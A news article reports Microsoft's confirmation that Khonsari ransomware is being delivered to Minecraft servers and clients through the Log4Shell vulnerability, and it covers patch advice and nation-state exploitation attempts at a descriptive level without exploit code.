Khonsari ransomware exploiting Log4j bug to target Minecraft servers, Microsoft confirms
Researchers observe multiple attempts to deploy a Khonsari ransomware that hits Windows machines by making use of Log4Shell bug
Microsoft reported on Wednesday that threat actors are attempting to deliver a new family of ransomware, dubbed Khonsari, on self-hosted Minecraft server by exploiting the critical Log4jShell security vulnerability.
In an update to its blog post about the security bug, the Redmond-based software giant said it can confirm the findings of cyber security firm Bitdefender which disclosed earlier this week the existence of the new Khonsari ransomware strain.
Bitdefender said it had observed multiple attempts by attackers to deploy a Khonsari ransomware payload which hits Windows machines by making use of the Log4jShell bug.
"Your files have been encrypted and stolen by the Khonsari family," Khonsari operatives write in their ransom note, according to Bitdefender.
"If you wish to decrypt, call (***) ***-1309 or email kar***[email protected]. If you do not know how to buy btc [Bitcoin], use a search engine to find exchanges. DO NOT MODIFY OR DELETE THIS FILE OR ANY ENCRYPTED FILES. IF YOU DO, YOUR FILES MAY BE UNRECOVERABLE."
In the case of non-Microsoft hosted Minecraft servers, Microsoft says threat actors have been sending malicious in-game messages to vulnerable servers. These malicious messages later exploit the Log4Shell bug to retrieve and run a malicious payload on both the vulnerable server as well as on any vulnerable clients that are connected.
The threat actors package Khonsari ransomware as a malicious Java class file, which is executed in the context of javaw.exe to ransom the device.
"In Microsoft Defender Antivirus data, we have observed a small number of cases of this [ransomware] being launched from compromised Minecraft clients connected to modified Minecraft servers running a vulnerable version of Log4j 2 via the use of a third-party Minecraft mods loader," Microsoft said.
The company is now advising all Minecraft server admins to immediately install the latest updates to secure them against these attacks. Players have been asked to exercise caution by only connecting to trusted Minecraft servers.
Last week, Mojang Studios, the video game developer behind Minecraft, released an emergency security update to address the Log4jShell vulnerability in the Apache Log4j Java logging library that is used by the game's Java Edition client and multiplayer servers.
"If you are running a multiplayer server, we highly encourage you to upgrade to this version as soon as possible," the advisory said.
Log4jShell, tracked as CVE-2021-44228, was publicly disclosed last week.
According to researchers, this bug exists in the Apache Log4j Java logging library and is highly dangerous, widespread and easy to exploit bug.
See also: Another Java Log4j vulnerability discovered
The flaw, tracked as CVE-2021-44228, allows attackers to execute malicious code on Java applications.
The vulnerability is triggered when a specially crafted string provided by the attacker through a variety of different input vectors is parsed and processed by the Log4j vulnerable component.
The bug poses a serious danger both because of the ubiquity of Log4j and because such an attack is easy to pull off.
Researchers at security firm Check Point said this week that they had observed Iranian hacking group APT 35 trying to exploit CVE-2021-44228 to target seven entities in the Israeli government and business sector.
"Reports of the last 48 hours prove that both criminal hacking groups and nation state actors are engaged in the exploration of this vulnerability, and we should all assume more such actors' operation are to be revealed in the coming days," the researchers said.